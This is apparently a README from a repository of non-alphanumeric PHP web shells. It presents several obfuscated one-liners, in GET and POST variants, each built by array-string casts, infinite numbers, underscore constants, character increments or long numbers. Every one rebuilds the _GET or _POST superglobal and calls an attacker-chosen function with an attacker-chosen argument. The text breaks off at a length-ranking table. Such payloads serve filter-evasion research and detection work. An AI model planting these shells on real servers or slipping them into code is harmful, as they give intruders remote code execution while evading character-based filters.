cli-ish/non-alphanumeric-webshell/README.md

 4. Long numbers `9**99` => `2.9512665430653E+94`
 5. Char Increment `'A'++` => `B`

 The speciality of the `Underscore constant` is that this will only work on pre php8 versions since the use of underscore as constant was then removed.

 Some version mix methods to be able to create working shells.

 ## Array into String (will throw warnings)

 **GET**

 ```php
 <?=$_=[]..1;$_=$_[1].$_[1].$_[1].$_[3]^-575..-1;$$_[0]($$_[1]);
 ```

 **POST**

 ```php
 <?=$_=[]..1;$_=$_[1].$_[3].$_[3].$_[3].$_[4]^-1.2.-1;$$_[0]($$_[1]);
 ```

 ## Infinite result into string

 **GET**

 ```php
 <?=$_=9**999...1;$_=801..-1^($_[4].+92..$_[0])^$_;$$_[0]($$_[1]);
 ```

 **POST**

 ```php
 <?=$_=-9**999...1;$_=4408..-1^$_^$_[3].$_[0].$_[6].$_[0].$_[1];$$_[0]($$_[1]);
 ```

 ---

 ## Underscore constant (deprecated in php8)

 **GET**

 ```php
 <?=$_=[]._;$_=_.($_[2].$_[2].$_[3]^575.._);$$_[0]($$_[1]);
 ```

 **POST**

 ```php
 <?=$_=[]._;$_=_.($_[3].$_[4].$_[3].$_[3]^1625.._);$$_[0]($$_[1]);
 ```

 ---

 ## Char Increment

 **GET**

 ```php
 <?=[$_=([]..1)[0],++$_,++$_,$__=$_++,++$_,++$_,++$_,$__.=++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,$_=$__.++$_,$__=$_(95).$_(71).$_(69).$_(84),$$__[0]($$__[1])];
 ```

 **POST**

 ```php
 <?=[$_=([]..1)[0],++$_,++$_,$__=$_++,++$_,++$_,++$_,$__.=++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,++$_,$_=$__.++$_,$__=$_(95).$_(80).$_(79).$_(83).$_(84),$$__[0]($$__[1])];
 ```

 ---

 ## Long numbers

 **GET**

 ```php
 <?=$_=(9**99...1)[15];$__=$_;$__++;$__++;$__++;$_=7002...1^-20.1..1^$_.$_.$_.$__;$$_[0]($$_[1]);
 ```

 **POST**

 ```php
 <?=$_=(9**99...1)[15];$_++;$_=4.08.$_^-89..-1^$_.$_.$_.$_;$__=$_[3];$_.=++$__;$$_[0]($$_[1]);
 ```

 ---

 ## Length Ranking

+Note the needed chars `<?=>` are only relevant when you are not in php context and need to declare it.
+If you are already in php you can ignore them and use teh shells without it but to be fair I included them in the payload length and at the needed chars.

 | Rank | Version                     | Method | Length | Needed Chars            |
 |------|-----------------------------|--------|--------|-------------------------|